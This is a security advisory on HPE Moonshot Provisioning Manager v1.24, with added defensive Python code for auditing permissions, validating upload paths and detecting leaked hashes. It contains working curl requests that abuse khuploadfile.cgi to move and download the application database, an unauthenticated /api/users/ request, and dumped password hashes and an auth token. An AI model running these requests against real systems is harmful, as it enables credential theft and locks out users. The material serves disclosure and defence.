While developing a Nessus plugin for CVE-2018-7072 and CVE-2018-7073, Tenable discovered that the fix in HPE Moonshot Provisioning Manager v1.24 for HPE advisory HPESBHF03843 is incomplete. In v1.24, /opt/hp/moonshot/upload/ and many other directories are still writable by the user moonshot:
# find / -maxdepth 5 -type d -user moonshot -perm /u+w -printf "%M %u %p \n" 2> /dev/null
drwx------ moonshot /home/moonshot
drwxr-xr-x moonshot /var/lib/moonshot
drwxr-xr-x moonshot /opt/hp/moonshot
drwxr-xr-x moonshot /opt/hp/moonshot/include
drwxr-xr-x moonshot /opt/hp/moonshot/repo
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/switch_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/prov_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tinkerbell
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/moonshot_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/task_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/upgrade
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/root
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/os_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/user_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/pydeps
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/conf
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tclient
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/bin
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/answers
drwxr-xr-x moonshot /opt/hp/moonshot/upload
drwxr-xr-x moonshot /opt/hp/moonshot/logs
drwxr-xr-x moonshot /opt/hp/moonshot/bin
drwxr-xr-x moonshot /opt/hp/moonshot/bin/__pycache__
drwxr-xr-x moonshot /opt/hp/moonshot/lib
drwxr-xr-x moonshot /opt/hp/moonshot/lib/python3.3
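Added example, not part of Tenable's advisory or HPE's product: a Python re-implementation of the permission check above, written so that a fix can be verified rather than eyeballed. It walks a subtree, reports directories owned by a given uid whose mode has the owner-write bit set (the same selection as the find command), and compares the result with an allow-list of directories the service account legitimately needs to write. Which directories belong on that allow-list is an assumption; the advisory does not say which ones HPE intends to remain writable.

```python
import os
import stat
from typing import Iterable, List, Set, Tuple


def owner_writable_dirs(root: str, uid: int, max_depth: int = 5) -> List[Tuple[str, str]]:
    """Directories at or below `root` (at most `max_depth` levels down, the
    starting point being depth 0) that are owned by `uid` and whose mode has
    the owner-write bit set.  Returns (find-style mode string, path) pairs,
    i.e. what `find ... -perm /u+w -printf "%M %u %p"` prints."""
    root = os.path.abspath(root)
    base_depth = root.rstrip(os.sep).count(os.sep)
    hits: List[Tuple[str, str]] = []
    for dirpath, dirnames, _files in os.walk(root):
        depth = dirpath.rstrip(os.sep).count(os.sep) - base_depth
        if depth >= max_depth:
            dirnames[:] = []          # stop descending here (find -maxdepth)
        try:
            st = os.lstat(dirpath)    # lstat: never judge a symlink by its target
        except OSError:
            continue                  # unreadable or vanished; find skips these too
        if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
            hits.append((stat.filemode(st.st_mode), dirpath))
    return hits


def unexpected_writable_dirs(root: str, uid: int, allowed: Iterable[str],
                             max_depth: int = 5) -> List[str]:
    """Audit helper: writable directories that are NOT on the allow-list of
    places the service account legitimately writes to (assumed here to be
    things like upload/ and logs/).  An empty result means the hardening is
    complete for this subtree."""
    allowed_abs: Set[str] = {os.path.abspath(a) for a in allowed}
    return sorted(path for _mode, path in owner_writable_dirs(root, uid, max_depth)
                  if path not in allowed_abs)


if __name__ == "__main__":
    import pwd
    import sys

    # Usage: python3 audit_writable.py [account]; defaults to the account
    # named in the advisory.
    account = sys.argv[1] if len(sys.argv) > 1 else "moonshot"
    try:
        uid = pwd.getpwnam(account).pw_uid
    except KeyError:
        sys.exit(f"no such user: {account}")
    for mode, path in owner_writable_dirs("/", uid):
        print(mode, account, path)
```

Run it as root after applying a vendor fix and feed the allow-list into unexpected_writable_dirs; anything it still returns is a directory the service account can write to that the fix did not address.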
For example, the attacker can move the db.sqlite3 file in /var/lib/moonshot to /opt/hp/moonshot/upload/:
$ curl -kd "isofile.savepath=/var/lib/moonshot/db.sqlite3&isofile.filename=db.sqlite3" https://<mpm_host>/cgi-bin/khuploadfile.cgi
<html>
<body>
<p>
File Upload Success
<p>
</body>
</html>
Then the attacker can fetch the db.sqlite3 file with:
$ curl -k -o db.sqlite3 'https://<mpm_host>/upload/db.sqlite3'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 95232 100 95232 0 0 294k 0 --:--:-- --:--:-- --:--:-- 567k
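The request above works because the CGI accepts a file path (isofile.savepath) from the client. As an added example, not HPE's code, here is the server-side check a hardened upload handler applies instead: the file's bytes come from the request body, the client supplies only a file name, the destination directory is fixed on the server, and the final path is verified to resolve inside the upload root after symlink expansion. The SAFE_NAME pattern and the UnsafePath exception are this example's own choices.

```python
import os
import re

# Only plain file names: no separators, no leading dot, no empty name.  The
# pattern is this example's choice, not something the advisory specifies.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


class UnsafePath(ValueError):
    """Raised when a client-controlled name would land outside the upload root."""


def safe_destination(upload_root: str, filename: str, subdir: str = "") -> str:
    """Return the one path a client-named file may be written to under
    `upload_root`.  The client chooses the file name only; the directory is
    fixed server-side, and even a server-chosen `subdir` is re-checked after
    symlink resolution so that a link planted inside the root cannot redirect
    the write elsewhere."""
    if not SAFE_NAME.match(filename):
        raise UnsafePath(f"rejected file name: {filename!r}")
    root = os.path.realpath(upload_root)
    # os.path.join would discard `root` if `subdir` were absolute; realpath
    # plus the commonpath test below catches that, '..' segments and symlinks
    # (including a symlink already sitting at `filename` inside the root).
    candidate = os.path.realpath(os.path.join(root, subdir, filename))
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafePath(f"destination {candidate!r} is outside {root!r}")
    return candidate


if __name__ == "__main__":
    # The parameters from the request quoted in the advisory.  A hardened
    # handler ignores isofile.savepath entirely and uses only the file name.
    params = {"isofile.savepath": "/var/lib/moonshot/db.sqlite3",
              "isofile.filename": "db.sqlite3"}
    print("would write to:", safe_destination("/opt/hp/moonshot/upload",
                                              params["isofile.filename"]))
    for bad in ("../db.sqlite3", "/var/lib/moonshot/db.sqlite3", "a/b.iso"):
        try:
            safe_destination("/opt/hp/moonshot/upload", bad)
        except UnsafePath as exc:
            print("blocked:", exc)
```

The name check and the commonpath check are deliberately both present: the first gives a clear error for the common case, the second is the one that actually holds when a symlink or an odd subdir value is involved.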
The db.sqlite3 file is the database for the 'tinkerbell' Django project and contains various information about the web application at https://<mpm_host>/. For example, it contains information about configured users and the authentication tokens of logged-in users:
$ sqlite3 db.sqlite3
SQLite version 3.6.20
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .table
auth_group moonshot_mgr_addressrecord
auth_group_permissions moonshot_mgr_chassis
auth_permission moonshot_mgr_chassisauthtoken
auth_user moonshot_mgr_nic
auth_user_groups moonshot_mgr_node
auth_user_user_permissions moonshot_mgr_switch
authtoken_token os_mgr_configurationfile
django_admin_log os_mgr_operatingsystem
django_content_type os_mgr_update
django_migrations prov_mgr_backup
django_session prov_mgr_clone
djkombu_message prov_mgr_install
djkombu_queue task_mgr_vlanassignmentrecord
sqlite> .header on
sqlite> select * from auth_user;
id|password|is_superuser|username|first_name|last_name|email|is_staff|is_active|date_joined|last_login
1|pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=|1|user1|user number 1|||1|1|2018-08-01 22:43:43.292870|2018-08-21 22:28:15.787135
2|pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=|1|user2|user number 2|||1|1|2018-08-21 22:47:59.549245|
sqlite> select * from authtoken_token;
key|created|user_id
e8419331029d8b4d24369cdab9a69b6d97bf3bf0|2018-08-21 22:27:23.451159|1
This information may help the attacker launch further attacks.
Also, because /var/lib/moonshot/db.sqlite3 is moved to /opt/hp/moonshot/upload/, valid users can no longer log in to the web UI at https://<mpm_host>/.
Tenable also found another security issue with the URL endpoint /api/users/, which allows an unauthenticated remote attacker to fetch all user accounts with sensitive information including password hashes:
$ curl -k 'https://<mpm_host>/api/users/'
[{"url":"https:/<mpm_host>/</api/users/1/","username":"user1","first_name":"user number 1","password":"pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":"2018-08-21T22:28:15.787135Z","date_joined":"2018-08-01T22:43:43.292870Z"},{"url":"https:///api/users/2/","username":"user2","first_name":"user number 2","password":"pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":null,"date_joined":"2018-08-21T22:47:59.549245Z"}]
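Added example, not from the advisory: a check an administrator or a scanner can run over a saved /api/users/ response body to confirm whether credential material is being returned. It recognises Django's <algorithm>$<iterations>$<salt>$<hash> hasher format (the pbkdf2_sha256 strings in the database dump and the API response above) as well as sensitive field names, and shows the field allow-list a corrected serializer would emit. The sample response embedded in the code is constructed, with placeholder salt and digest values. Requiring authentication on the endpoint is a separate fix that this code does not provide.

```python
import json
import re
from typing import Any, Dict, List, Optional

# Django's password hasher encoding: <algorithm>$<iterations>$<salt>$<base64 digest>.
DJANGO_HASH = re.compile(
    r"^(?P<algorithm>[a-z0-9_]+)\$(?P<iterations>\d+)\$(?P<salt>[^$]+)\$(?P<digest>[A-Za-z0-9+/=]+)$"
)
# Field names that must never appear in an API response, whatever their value.
SENSITIVE_KEYS = {"password", "key", "token"}

# Constructed sample shaped like the /api/users/ output above; salt and digest
# are placeholders, not real values.
SAMPLE_RECORDS = [
    {"url": "https://mpm.example/api/users/1/", "username": "user1", "first_name": "user number 1",
     "password": "pbkdf2_sha256$20000$EXAMPLESALT$EXAMPLEDIGESTEXAMPLEDIGESTEXAMPLEDIGESTEXA=",
     "email": "", "is_staff": True, "is_active": True, "is_superuser": True},
    {"url": "https://mpm.example/api/users/2/", "username": "user2", "first_name": "user number 2",
     "password": "pbkdf2_sha256$20000$EXAMPLESALT$EXAMPLEDIGESTEXAMPLEDIGESTEXAMPLEDIGESTEXA=",
     "email": "", "is_staff": True, "is_active": True, "is_superuser": True},
]
SAMPLE_RESPONSE = json.dumps(SAMPLE_RECORDS)


def parse_django_hash(value: Any) -> Optional[Dict[str, Any]]:
    """Components of a Django-style password hash, or None if `value` is not one."""
    if not isinstance(value, str):
        return None
    m = DJANGO_HASH.match(value)
    if not m:
        return None
    return {"algorithm": m["algorithm"], "iterations": int(m["iterations"]), "salt": m["salt"]}


def exposed_secrets(body: str) -> List[Dict[str, Any]]:
    """Scan a JSON API response (one object or a list of objects) for fields
    that leak credentials: a sensitive key name, or a value shaped like a
    Django password hash under any key.  One finding per (record, field)."""
    data = json.loads(body)
    records = data if isinstance(data, list) else [data]
    findings: List[Dict[str, Any]] = []
    for record in records:
        if not isinstance(record, dict):
            continue
        who = record.get("username", "<no username>")
        for key, value in record.items():
            parsed = parse_django_hash(value)
            if key in SENSITIVE_KEYS or parsed:
                findings.append({
                    "username": who,
                    "field": key,
                    "algorithm": parsed["algorithm"] if parsed else None,
                    "iterations": parsed["iterations"] if parsed else None,
                })
    return findings


PUBLIC_FIELDS = ("url", "username", "first_name", "email", "is_staff", "is_active", "is_superuser")


def public_view(record: Dict[str, Any], allowed=PUBLIC_FIELDS) -> Dict[str, Any]:
    """The allow-list a fixed serializer uses: only listed fields are emitted,
    so a hash can never be returned even though the model stores one."""
    return {k: record[k] for k in allowed if k in record}


if __name__ == "__main__":
    for f in exposed_secrets(SAMPLE_RESPONSE):
        print(f"{f['username']}: field {f['field']!r} exposes {f['algorithm']} ({f['iterations']} iterations)")
    print("safe record:", public_view(SAMPLE_RECORDS[0]))
```

Because the scan keys on the hash shape and not only on the field name, it also catches a hash that a serializer has copied into a differently named field, which a simple "is there a password key" check would miss.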